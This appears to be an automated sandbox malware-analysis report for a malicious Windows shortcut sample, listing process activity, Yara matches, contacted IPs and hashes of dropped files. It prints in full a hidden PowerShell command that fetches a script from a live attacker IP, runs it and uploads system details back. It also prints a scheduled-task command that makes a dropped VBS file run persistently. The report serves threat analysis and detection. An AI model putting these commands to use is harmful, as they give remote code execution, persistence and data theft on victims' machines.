Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn\|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn\|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: Yara match	File source: 00000010.00000002.4545241066.00000107F6460000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4358131758.00000245D7680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4358131758.00000245D7686000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4358131758.00000245D76C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3475796002.000001DE79AE7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2066672979.0000026B63953000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2085530098.0000018899B05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4358273831.00000245D7825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2085268300.000001889994C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2066672979.0000026B639B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4358131758.00000245D76DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2085268300.0000018899957000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2085268300.0000018899997000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4545241066.00000107F64F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3415629273.000001DE5F7E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4521422067.0000010780085000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4521422067.000001078019C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 7272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 4796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5244, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\Libraries\Recorded.vbs, type: DROPPED

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.41.168.139	unknown	United States		6461	ZAYO-6461US	false
2.59.222.98	unknown	Ukraine		209155	ONEHOSTPLANETUA	true

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.214.172	true
x1.i.lencr.org	unknown	unknown

ID:	1522697
Product:	CloudBasic
Start time:	15:40:20
Start date:	30.09.2024
Sample:	140AEcuVy7.lnk
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	64752d058e5829210a0f407fb912c9d3
SHA1:	4e8a0cfb784a6f93f8974b4f11679786cef86bb7
SHA256:	0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51
Filetype:	Windows Shortcut (20020/1) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Network\Downloader\edb.chk	data	663C5D6018506231E334FB3EA962ED1C	539A4641CE92E57E4ADEE32750A817326E596D4C	066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	0E63EA942E7D0C185B0774752F32E8FF	9D536989316B42E8B072E33E2361ACC59511ADA5	35D1AA8B1B797192A6EFF54B0F239E3A3CCE3E70417A2F4F9753DCF0C0E3CD22
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage engine DataBase, version 0x620, checksum 0xfdfa5f68, page size 16384, Windows version 10.0	1AB39FB2083EDDE9E8323012F6A85D4F	D91355EE21454F0C8E9FF7C75A378D34B052F3EF	404F96845E9340733F063230084704E910F1D1B8AABC59E0A6C7B127E301BFAD
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	4A25EE32176C72B8A73A3586B49B4441	D93176CFC71F3AC8CC57C701AAE347DA1618373B	0B30ECD0817DBACE604F38F5958461F3798B472D853783057F4E430B5EEB9895
C:\Users\Public\Libraries\Recorded.vbs	ASCII text, with very long lines (708), with CRLF line terminators	79C5A75750D2C901E3212EADD6A66BC0	DBA1B8554D40DA5C9A41CF9025BE70C6BE9EF0B1	9284000139B2FA271F420224CBF794571F94CF0A1DD30A069FB26CC3CC68F3F8
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG	ASCII text	C82E6457BC0DCE54C6670E733D5037A7	02664CB637AA4E81ED408D54E1FBEEDE52D767B6	3B1EA92C98BB5712CE37F2CF6BD3495D84F1175AA045ABB89A438AA9E8A54977
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)	ASCII text	C82E6457BC0DCE54C6670E733D5037A7	02664CB637AA4E81ED408D54E1FBEEDE52D767B6	3B1EA92C98BB5712CE37F2CF6BD3495D84F1175AA045ABB89A438AA9E8A54977
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG	ASCII text	80A9EB8B5721A37C7BF8A34FB0B10FD3	05CED9B9A513B779C54D3B72F78BAE18E4FE71AD	0F2225D1D5216F54D6A8D626BB37D9276CA51E47EE9D030B5E3ED070714FB67C
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)	ASCII text	80A9EB8B5721A37C7BF8A34FB0B10FD3	05CED9B9A513B779C54D3B72F78BAE18E4FE71AD	0F2225D1D5216F54D6A8D626BB37D9276CA51E47EE9D030B5E3ED070714FB67C
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\55be8faf-6076-4f25-9e29-ee7ee9cdfb3a.tmp	JSON data	3833200A0C82391B2C72987EB45FF9F0	499564DDA2022AEA9EC297D6FAE404AC9C38DA85	2531DBD5197AF4B31C2EEAC48BC57F292D233DF5DE9308DEA2D6A9F14E21E1C8
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)	JSON data	3833200A0C82391B2C72987EB45FF9F0	499564DDA2022AEA9EC297D6FAE404AC9C38DA85	2531DBD5197AF4B31C2EEAC48BC57F292D233DF5DE9308DEA2D6A9F14E21E1C8
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log	data	A9D415932ECEFE5AFAA54B948D69C030	911B639E44A1C103FAC1EBF0B16648C3609BFB58	BC03BABEEF2591FC260C1BEE782559E7B256BE15B55718EDA965722FCD264250
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG	ASCII text	053FECF9EB9B9D8FB34B6193248FF6CB	3DB0E1704FCBD923C3F2B699DDEDB912D0DEDC74	F1A02A54BAAD9993DF5B93BB7EE15998C0D10DA430D4BD6DF62EDE548C6C66B2
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)	ASCII text	053FECF9EB9B9D8FB34B6193248FF6CB	3DB0E1704FCBD923C3F2B699DDEDB912D0DEDC74	F1A02A54BAAD9993DF5B93BB7EE15998C0D10DA430D4BD6DF62EDE548C6C66B2
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-240930134117Z-159.bmp	PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54	913275AD9D8A17D6FE2695BB51BC7863	9C29246D92F80A7BDDEC1B53C8705EDBDC0A4759	5E6EBDE5554818D0BD1203842D3FEE08CF894B3426C291244506CF749A3569CB
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages	SQLite 3.x database, last written using SQLite version 3040000, file counter 3, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 3	E55F55F4B1B18FC52B77F52E998D909A	3E70FDC13A5EF4CC836901855EC7800D0981F69D	8D39AD6168C2C9B57C8F9797EA8051A5B98B62FC9B805BAA077967826AAFB225
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal	SQLite Rollback Journal	D9BD49178C6CADA353402D9D88C05DED	AB77FA5C0C17EDBEF07BBD8E44FED60A6CA3F5ED	1F805A69E696FBD08EDDD9AEFF78DE7497479E324FCB2DA1ED949CDB2675CF89
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D	Certificate, Version=3	0CD2F9E0DA1773E9ED864DA5E370E74E	CABD2A79A1076A31F21D253635CB039D4329A5E8	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	49AEBF8CBD62D92AC215B2923FB1B9F5	1723BE06719828DDA65AD804298D0431F6AFF976	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D	data	179C62DC8C48488C7543ACDB5690C564	CED9910F667AB80D460272BEDF55008ED86ABB45	1C72A895C74852DD98AE1BF6766507C624273AD6112DE28860DE5483BDD1D8F3
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	5719806268D8B876E3B57EABA98B30D3	840F16EA128B7F1D30455572C6DDF9B0E10CA3B6	AF0947280DDE33E20FED3432452C913C7D7D5BE9BF3B5635411977FC7A5A3A27
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.7180	PostScript document text	94185C5850C26B3C6FC24ABC385CDA58	42F042285037B0C35BC4226D387F88C770AB5CAA	1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)	PostScript document text	94185C5850C26B3C6FC24ABC385CDA58	42F042285037B0C35BC4226D387F88C770AB5CAA	1D9979A98F7C4B3073BC03EE9D974CCE9FE265A1E2F8E9EE26A4A5528419E808
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING	data	DC84B0D741E5BEAE8070013ADDCC8C28	802F4A6A20CBF157AAF6C4E07E4301578D5936A2	81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json	JSON data	19332271EF267D6062660175B419E3D0	030EAAD7879E86F963E72E2BE19D23C32700BB0B	FF6896335F2555FDC51D6417D9923F67F531DFCBB86AB0F5E36B316BB96476FB
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents	SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25	5C9DB498269693EB82B446AA88967336	6FD378383CAAE18F7089C4420CBBB0670F2A1D5A	06D261ADF676B6606050651A2390FCC0657E0FE942BEF9D9E599E60CE6BF4FFE
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal	SQLite Rollback Journal	A90EF5C9045D83E1829343557FA55A44	A1F4B82B9594B5D3F4234F71040D8BDBE1FE64C9	8D3FE153DD3936EF9E4320E7777D2C2E0976BB171B6A6C448351C8E9C4D165E7
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	D3594118838EF8580975DDA877E44DEB	0ACABEA9B50CA74E6EBAE326251253BAF2E53371	456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	446DD1CF97EABA21CF14D03AEBC79F27	36E4CC7367E0C7B40F4A8ACE272941EA46373799	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
C:\Users\user\AppData\Local\Temp\MSI46ff5.LOG	Unicode text, UTF-16, little-endian text, with CRLF line terminators	DE8A7A65D6943CD1E3804D47B7DCABAC	A7AD9CF42504F5126E523C8205AB6CD4E12604F7	96C0A18492CAF5283D11456E03321F54192FBC27418422C0EA4EEB434C11C120
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehlaueuw.yqf.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqkvfyiw.kd2.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzsgmhdk.jho.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onro1u3v.pdn.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uq2zlf43.1ne.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdwiwnyt.t1q.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9x48zfd_4niua0_5jg.tmp	Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)	BA1716D4FB435DA6C47CE77E3667E6A8	AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF	AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-09-30 09-41-15-662.log	ASCII text, with very long lines (393)	1336667A75083BF81E2632FABAA88B67	46E40800B27D95DAED0DBB830E0D0BA85C031D40	F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log	ASCII text, with very long lines (393), with CRLF line terminators	B49F37DC58215199E0F52BD867E32E58	546FB58C685730D4B2D91A6842A4D96CF1716771	E14B6DF2B8D784EE9D534FA2AB62A2B0C524A3D47A3C829AD21B153376F70C81
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt	ASCII text, with CRLF line terminators	C39D1EC004F7D30D7C76A5ECFC7B57BB	A069B5DC2893D8F401F50B72173DA07603CA9C15	2A8B4772DD0AD8CD50C524681E97A1F75A058BCE66E561C7217A397C0D95D9E4
C:\Users\user\AppData\Local\Temp\acrocef_low\2351a3dc-1c3b-40fd-b656-15c9bdc47dd9.tmp	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142	18E3D04537AF72FDBEB3760B2D10C80E	B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC	BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
C:\Users\user\AppData\Local\Temp\acrocef_low\41d075c6-81f5-4c39-b32d-67347b3fd59c.tmp	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538	3A49135134665364308390AC398006F1	28EF4CE5690BF8A9E048AF7D30688120DAC6F126	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
C:\Users\user\AppData\Local\Temp\acrocef_low\95c130ec-c7c6-4a79-a977-a793115afd75.tmp	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081	A0CFC77914D9BFBDD8BC1B1154A7B364	54962BFDF3797C95DC2A4C8B29E873743811AD30	81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
C:\Users\user\AppData\Local\Temp\acrocef_low\e471c114-2162-4110-b6ef-c1565c55c78e.tmp	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022	5C48B0AD2FEF800949466AE872E1F1E2	337D617AE142815EDDACB48484628C1F16692A2F	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
C:\Users\user\AppData\Local\Temp\document.pdf	PDF document, version 1.4, 1 pages	E762F98EBF5E28324CCC2FA4BA4FC3BB	EFF5094BB9056A44FE39CCFE4C480CAAD61F8096	53812D7BDAF5E8E5C1B99B4B9F3D8D3D7726D4C6C23A72FB109132D96CA725C2
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl	data	7113425405A05E110DC458BBF93F608A	88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF	7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl	data	5274D23C3AB7C3D5A4F3F86D4249A545	8A3778F5083169B281B610F2036E79AEA3020192	8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
